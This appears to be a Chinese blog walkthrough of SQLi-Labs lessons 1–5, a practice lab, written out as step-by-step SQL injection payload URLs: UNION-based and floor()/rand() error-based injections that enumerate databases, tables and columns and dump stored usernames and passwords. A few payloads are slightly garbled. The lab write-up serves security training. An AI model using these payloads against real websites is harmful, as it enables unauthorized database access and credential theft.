SQL1~5关

最新推荐文章于 2022-06-12 14:05:58 发布
最新推荐文章于 2022-06-12 14:05:58 发布
阅读量4k 收藏 1
点赞数
文章标签: 安全 sql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tbygadgjsad/article/details/123113619
版权

第一关:

1.访问SQLI-Labs网站,进入靶场

右键打开检查,进入到Hackbar(火狐插件)输入http://ip/sqli-labs/less-1/?id=1

 

点击Execute观察页面变化

此时页面显示id=1的用户名Dump、密码Dump。

2.寻找注入点

分别使用以下3条payload寻找注入点及判断注入点的类型:

http://ip/sqli-labs/less-1/?id=1' //报错

 http://ip/sqli-labs/less-1/?id=1' and '1'='1 //运行正常

 http://ip/sqli-labs/less-1/?id=1' and '1'='2//未正常显示

 由上述结果可以判断,网站存在字符型注入点。

3.判断网站查询的字段数

 http://ip/sqli-labs/less-1/?id=1' order by 1--+ //正常显示

  http://ip/sqli-labs/less-1/?id=1' order by 2--+ //正常显示

 http://ip/sqli-labs/less-1/?id=1' order by 3--+ //正常显示

 http://ip/sqli-labs/less-1/?id=1' order by 4--+  //报错

 由此可知,网站查询的字段数为3。

4.判断网站的回显位置

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,3--+ //执行结果:2号位和3号位可以回显。

 5.获取网站当前所在数据库的库名

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,database()--+ //显示结果为security。

 6.获取数据库security的全部表名

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,group_concat(table_name)

 from information_schema.tables where table_schema='security'--+

 显示结果中,有一个名为users的表,这当中可能存放着网站用户的基本信息。

7.获取users表的全部字段名

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,group_concat(column_name)

 from information_schema.columns where table_schema='security' and table_name='users'--+

 显示结果,users表中有id、username和password三个字段。

8.获取users表id、username和password字段的全部值

由于users表中存放着多组用户名和密码的数据,而每次只能显示一组数据,我们可以通过limit M,N的方式逐条显示,如下:

(1)显示第一组数据

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password)

 from security.users limit 0,1--+

 结果显示为dump、dump

(2)第二组数据

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password)

 from security.users limit 1,1--+

 显示结果为Angelina,I-kill-you。

(3)第三组

http://ip/sqli-labs/less-1/?id=1' and 1=2 union select 1,2,concat_ws(',',id,username,password)

 from security.users limit 2,1--+

 以此类推,可通过修改limit后面的参数,将users表中存放的所有用户信息全部暴露出来。

 第二关:

访问SQLI-Labs网站less-2

登录后如图

 先给定一个GET参数,即http://ip/sqli-labs-master/less-2/?id=1如图显示id=1的用户名dump、密码dump。

 2.寻找注入点

http://ip/sqli-labs-master/less-2/?id=1'   //报错

 http://ip/sqli-labs-master/less-2/?id=1 and 1=1 //正常

 http://ip/sqli-labs-master/less-2/?id=1 and 1=2 //未正常显示

 由此可知,网站存在数字型注入点

3.判断网站查询的字段数

 http://ip/sqli-labs-master/less-2/?id=1 order by 1--+ //正常

  http://ip/sqli-labs-master/less-2/?id=1 order by 2--+ //正常

 http://ip/sqli-labs-master/less-2/?id=1 order by 3--+ //正常

 http://ip/sqli-labs-master/less-2/?id=1 order by 4--+ //报错

 由此可知,网站的查询的字段数为3.

4.判断网站的回显位置(和第一关一样)

5.获取网站当前所在数据库的库名(同上)

6.获取数据库security的全部表名(同上)

7.获取users表的全部字段名(同上)

后面都与第一关相同

第三关

1.第一步首先判断注入类型(根据提示,这关的注入类型是:单引号和单括号注入)

 2.判断有几个字段位可显示数据

http://ip/sqli-labs-master/less-3/?id=1') order by 1--+

http://ip/sqli-labs-master/less-3/?id=1') order by 2--+

http://ip/sqli-labs-master/less-3/?id=1') order by 3--+

http://ip/sqli-labs-master/less-3/?id=1') order by 4--+ //报错

 由此可得,有3位字段位

3.判断可显示数据的有几位

http://ip/sqli-labs-master/less-3/?id=-1') union select 1,2,3 --+

 数据显示位只有2和3

4.爆破数据库名

http://ip/sqli-labs-master/less-3/?id=-1') union select 1,database(),3 --+

 

5.爆出表名

http://ip/sqli-labs-master/less-3/?id=-1') union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

 表名分别为:emails、referers、uagents、users

爆出字段名

 http://ip/sqli-labs-master/less-3/?id=-1') union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+

7.爆出数据

http://ip/sqli-labs-master/less-3/?id=-1') union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+

 

第四关

与第三关对比

第三关

 

 

第四关

第四关根据提示知道是基于双引号的错误

判断回显

http://ip/sqli-labs-master/Less-4/?id=-1") union select 1,2,3--+

 

爆出数据库名

http://ip/sqli-labs-master/less-4/?id=-1") union select 1,database(),3 --+

 爆出表名

http://ip/sqli-labs-master/less-4/?id=-1") union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+

 爆出字段名

http://ip/sqli-labs-master/less-4/?id=-1") union  select 1,database(),(select group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users') --+

 

 爆出数据

http://ip/sqli-labs-master/less-4/?id=-1") union select 1,(select group_concat(username) from users),(select group_concat(password) from users) --+
 

第五关

登录后页面

 这一关,当输入正确的id时,会输出 You are in……,而输入错误的则什么都没有,只有个welcome

http://ip/sqli-labs-master/less-5/?id=1

 http://ip/sqli-labs-master/less-5/?id=0

 

 http://ip/sqli-labs-master/less-5/?id=1"

  http://ip/sqli-labs-master/less-5/?id=1' //当使用'的时候,提示SQL语法中出现错误。

 发现有sql语法错误,应该是floor报错注入
这里用到了floor()报错:

http://IP/sqli-labs/Less-5/?id=1’ and (select 1 from (select count(),concat((payload),floor (rand(0)2))x from information_schema.tables group by x)a) --+

查询库名 

1、用limit0,1

http://IP/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 0,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+

 查出了名为information_schema、challenges...的数据库

2、用limit 1,1

http://IP/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 1,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+
 

 查出了challenges的数据库

3.用limit2,1

http://IP/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 2,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+

 4,、用limit 3,1

http://IP/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 3,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+

 5、用limit 4,1

http://IP/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 4,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+

 6、用limit 5,1

7,、用limit 6,1

http://IP/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat((select schema_name from information_schema.schemata limit 4,1),floor (rand()*2)) as x from information_schema.tables group by x) as a) --+

limit 7,1......直到页面显示 如下图不报错,确定数据库的数量

 有一条命令能直接找到名为security的数据库

 http://IP/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat((database()),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

 

 查询表名

利用security库,在limit 3,1中找到了users表

 http://IP/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat(((select concat(table_name) from information_schema.tables where table_schema='security' limit 3,1)),floor (rand(0)*2))x from information_schema.tables group by x)a) --+

 

查字段

查询users表里的字段,limit 0,1是ID

http://IP/sqli-labs/Less-5/?id=1' and (select 1 from (select count(*),concat((select concat(column_name,';') from information_schema.columns where table_name='users' limit  0,1),floor(rand()*2)) as x from information_schema.columns group by x) as a) --+

 limit 1,1是

 limit 2,1是

 查询first、last字段的值(limit 1,1、limit 2,1......)

http://IP/sqli-labs/Less-5/?id=1' and(select 1 from (select count(*),concat((select concat(username,': ',password,';') from security.users limit 1,1),floor(rand()*2)) as x from security.users group by x) as a)--+

 

雲小
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqlilabs(1-5)
lulu001128的博客
02-27 125
sql
sqli-labs 1-5
qq_41326328的博客
03-28 1202
这次写一个sql注入的闯游戏,叫sqli-liabs,这个源码在网上搜索一下sqli-liabs源码下载,放到phpstudy环境里, 注意:这里把phpstudy版本调到5.5,别问我为什么,厂长是我的表哥 下面先说一下, 注入分为数字型注入和字符串型注入 区别: ?id=1 and 1=1 ?id=2 and 1=2 回显不一致则为数字型注入,回显一致的话再继续判断 ?di=1’ ...
Sqli-labs 1-5
Darklord.W
04-10 178
Sqli-labs 1-5步骤级截图说明 第一: GET-Error based-Single quotes-String(基于错误的GET单引号字符型注入) 尝试?id=1: ?id=1'--+ 其中--+为注释后面内容 该注入为单引号注入 接下来判断列数,为3列 然后通过union查询判断数据回显位置 查询库名,数据库版本 库名为securi...
sqli-lab(1-5)卡笔记
Yoo_666的博客
07-20 517
这里写自定义目录标题sqli-lab知识储备数据库语法第一第二第三第四第五 sqli-lab 知识储备 数据库 MySQL内置数据库——information_schema information_schema三张键表——schemata、tables、 columns schemata表(数据库名)的schema_name列存放的是所有的数据库名 tables表(表名)的table_schema列存放的是所有的数据库名, table_name列存放的是数据库对应的所有表名。 colum
sqli-labs代码审计1-5
willow_liang的博客
10-27 301
本文将对sqli-labs进行代码审计 LESS-1 通过payload查询出数据库名 ' union select 1,database(),user()--+ '闭合id,然后进行联合查询 Less-2 payload -1 union select 1,database(),user() 明早上继续
泛微OA8前台sql注入1
08-08
1. 使用预编译的SQL语句(如Java的PreparedStatement),并绑定参数,避免SQL注入。 2. 对用户输入进行严格验证和过滤,只允许预期的字符和格式。 3. 限制应用程序对数据库的权限,避免使用具有广泛权限的数据库连接...
37724074Learning-SQL_X2V5NFC_learningsql_
09-30
5. **窗口函数**: 这是SQL的一个高级特性,如RANK()、ROW_NUMBER()、LEAD()和LAG()等,它们在数据分组后提供行级别的信息,常用于排名、移动平均和计算差异等。 6. **创建和修改表**: 了解如何使用CREATE TABLE语句...
sql-labs 1-10 含多种解法 包括sqlmap py脚本
最新发布
07-23
### SQL-Labs 1-10 解析与多种解法 #### Less-1:基本SQL注入 在这一中,玩家将面对一个常见的SQL注入点。注入点出现在URL参数中,例如`?id=1'`。此卡旨在考察用户是否了解SQL注入的基本原理及其应用。 **...
SQL_Partie1_sql_
09-30
标题 "SQL_Partie1_sql_" 暗示我们即将探讨的是SQL(Structured Query Language)的基础教程,特别是第一部分,可能涉及SQL的初步概念和基本操作。描述中的 "French SQL cours Part1 (introduction to squares)...
迷你sql2000,SqlServer数据库
05-04
尽管SQL Server 2000已经是一款较老的产品,不再受到微软的官方支持,但它的基础知识和原理对于理解现代的SQL Server版本仍然至重要。对于初学者而言,了解并掌握SQL Server 2000的基本操作和概念,是进入数据库...
sqli-labs攻1(错误型注入、双查询注入)
qwzf
07-16 1523
sqli-labs攻(一) 前言 为了更好的学习和练习有SQL注入的知识,于是我开启了sqli-labs的通之路。。。。 为了方便学习查看,我在源码中的$sql下一句语句写以下php语句(就是输出拿到数据库查询的完整语句是怎么样的) echo "你的 sql 语句是:".$sql."<br>"; 在开始注入之前,我学习了下面这些相sql注入基础知识。 sql注入基础知识 ...
数据库的单表查询,熟悉SQL语句
热门推荐
qq_35508162的博客
09-03 1万+
回顾MYSQL 回顾JDBC 今日学习目标: 使用SQL语句完成单表的增删改查 使用JDBC通过java代码完成单表的增删改查 创建数据库:create 数据库名; 删除数据库:drop database 数据库名; 查看数据库:show databases; 创建数据库并进行设置编码格式:create database 数据库名 character set gbk; 显示数据库...
打靶sqli-labs靶场3-4
weixin_48852738的博客
06-11 965
sqli-labs靶场3-4
SQL注入基础-易错问题汇总
weixin_30606461的博客
08-02 618
SQL注入基础-易错问题汇总 1.sql注入本质是什么 把用户输入当做代码执行 2.sql注入的条件 用户可控输入和原本程序要执行代码,拼接用户输入且当作SQL语句去执行 3.order by的作用及含义 order by 用于判断显示位,order by 原有的作用是对字段进行一个排序,在sql注入中用order by 来判断排序,order by 1就是对一个字段...
SQLI-LABS(二)
weixin_52398420的博客
11-26 285
SQLI-LABS(二) 前四流程: 1、判断是否存在sql注入漏洞 2、使用order by 查看列数 3、使用联合查询判断回显位置 4、在回显位置处注入sql语句进行查询 **我们可以在sql文件中每一文件中的index.php中写入代码 echo $sql; echo “< br >”; 以方便做题时查看sql语句; ** Less-1: ** 1、判断:?id=1’ 在这里插入图片描述 出现报错,证明存在sql漏洞,其中 报错信息 为’‘1’’ LIMIT 0,1’ at line
sql注入详解
m0_67392811的博客
06-12 5908
目录前言? ?一、漏洞原因分析二、漏洞危害三、sql注入防范四、如何挖掘sql注入漏洞五、常见的注入手法联合查询(union注入)报错注入基于布尔的盲注基于时间的盲注HTTP头注入宽字节注入堆叠查询二阶注入六、sql注入getshell的几种方式结构化查询语言(Structured Query Language,缩写:SQL),是一种特殊的编程语言,用于数据库中的标准数据查询语言。SQL注入(SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没
SQL 注入-基于联合查询的字符型GET注入
xdjxi的博客
02-16 647
实验原理 字符型GET注入,其注入点存在于URL中的GET参数处; 攻击者可以通过构造恶意的GET输入参数,利用union select 命令进行注入,暴露数据库中存储的信息。 实验步骤 1 访问SQLI-Labs网站 http://(加靶机IP)/sqli-labs/Less-1/ 登录后,根据网页提示,定一个GET参数 http://(靶机ip)/sqli - labs / Less/?id=1 2 寻找注入点 用以下三条payload寻找注入点及判断注入点的型; http:/
mysql order by = 用法说明(order by id=1 desc/asc)
BHSZZY的博客
09-07 3696
最近工作中发现一个order by不太常见的用法,总结如下:
[转]order by 1是什么意思?
weixin_30318645的博客
06-20 1114
ORDER BY 1 表示 所select 的字段按第一个字段排序ORDER BY ASC应该没有这样写法,ORDER BY 后面不是字段就是数字,可以ORDER BY 1 ASC 或者ORDER BY COL1 ASCASC表示按升序排序,DESC表示按降序排序 来源:http://doudouweed.blog.sohu.com/120271609.html 转载于:https:...
SQLi靶场实战揭秘:1-5策略
在本篇文章中,作者深入探讨了SQL注入这一键的网络安全问题,特别是针对SQLlib靶场1-5的实战通过程。SQL注入是一种常见的Web应用程序安全漏洞,它发生在Web应用程序未对用户输入数据进行充分验证和过滤时,允许...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值